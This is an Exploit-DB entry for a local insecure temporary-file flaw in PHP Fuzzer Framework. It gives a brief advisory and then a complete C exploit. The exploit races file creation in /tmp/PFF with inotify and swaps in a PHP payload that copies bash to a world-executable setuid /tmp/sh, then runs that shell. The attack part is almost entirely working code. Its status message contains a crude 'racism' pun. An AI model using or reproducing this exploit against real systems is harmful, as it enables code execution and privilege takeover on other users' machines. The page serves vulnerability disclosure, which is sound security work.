PHP Fuzzer Framework - Default Location Insecure Temporary File Creation

EDB-ID:

33145

CVE:

N/A

EDB Verified:

Author:

Melissa Elliott

Type:

local

Exploit: /

Platform:

Linux

Date:

2009-08-03

Vulnerable App:

// source: https://www.securityfocus.com/bid/35924/info

PHP Fuzzer Framework creates temporary files in an insecure manner.

An attacker with local access could potentially exploit this issue to overwrite and execute arbitrary code with the privileges of the victim user. Successfully exploiting this issue may compromise the affected application and possibly the computer.

#include <stdio.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/inotify.h>
#define FILEA "/tmp/PFF/fuzz0.php"
#define FILEB "/tmp/fuzzlol.php"
#define MODEZ (S_IRWXU | S_IRWXG | S_IRWXO)


int main(int argc, char *argv[])
{
    int f,n,w;
    char *s = "<? system(\"cp /bin/bash /tmp/sh; chmod 4777 /tmp/sh\"); ?>";
    struct inotify_event e;
    n = inotify_init();
    printf("-=*************-\n");
    if ((f = open(FILEB, O_CREAT | O_RDWR| O_EXCL, MODEZ)) > 0){
        write(f, s, strlen(s));
        close(f);
    }
    printf("[+] created abritrary code: %s\n",  FILEB);
    w = inotify_add_watch(n, "/tmp/PFF", IN_CREATE);
    read(n, &e, sizeof(e));
    rename(FILEB, FILEA);
    printf("[+] %s => %s\n", FILEB, FILEA);
        printf("[+] executing arbitrary code\n");
    sleep(2);
    printf("[+] racism complete \n");
    execl("/tmp/sh", "/tmp/sh", 0);

}

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services